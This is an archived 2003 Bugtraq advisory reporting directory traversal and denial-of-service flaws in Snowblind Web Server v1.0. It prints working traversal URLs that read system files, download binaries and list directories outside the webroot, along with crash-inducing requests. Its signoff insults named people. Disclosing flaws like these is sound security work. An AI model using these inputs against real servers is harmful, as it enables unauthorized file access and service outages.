lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <3EC52E4B.000015.01393@pantene.yandex.ru>
Date: Fri, 16 May 2003 22:30:35 +0400 (MSD)
From: "euronymous" <just-a-user@...dex.ru>
To: bugtraq@...urityfocus.com, vuln@...urity.nnov.ru
Subject: Snowblind Web Server: multiple issues


=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
topic: Snowblind Web Server: multiple issues
product: Snowblind Web Server v1.0
vendor: www.snowblind.net
risk: high
date: 05/16/2k3
tested platform: Windows 98 Second Edition
discovered by: euronymous /F0KP 
advisory urls: http://f0kp.iplus.ru/bz/022.en.txt
               http://f0kp.iplus.ru/bz/022.ru.txt 
contact email: euronymous@...us.ru
=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=

description
-----------

i have found couple issues in this http-server. they 
are: directory traversal and DoS attacks. 


directory traversal
-------------------

1. you can read and download any file out of webroot:

http://hostname/../../windows/system.ini

or 

http://hostname/internal.sws?../../windows/system.ini


2. also you can download any binary file in this manner:

http://hostname/internal.sws?../../windows/calc.exe

this request will download program file calc.exe with 
name internal.sws

http://hostname/internal.sws?sws.exe

download webserver itself )).


3. directory listing out of webroot.

note: this bug will works if only `Allow directory 
listings' is turned on [ in default its do ].

http://hostname/.../

will print contents of root directory on that disk 
drive.


Denial of Service
-----------------

1. this url will crash webserver:

http://localhost/</


2. if you send GET request, that contains more >=219 
charakterz, then you will crash the server..

request example:

GET /fff[ x 129 ]ffff HTTP/1.0


shouts: DWC, DHG, NetPoison, HUNGOSH, security.nnov.ru, 
N0b0d13s Team and all russian security guyz!! 
to kate especially )) 
hates: slavomira and other dirty ppl in *.kz $#%&^!  
k0dsweb lamers team == yeah, i really __HATE__ yours!!
          

================
im not a lame,
not yet a hacker
================



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ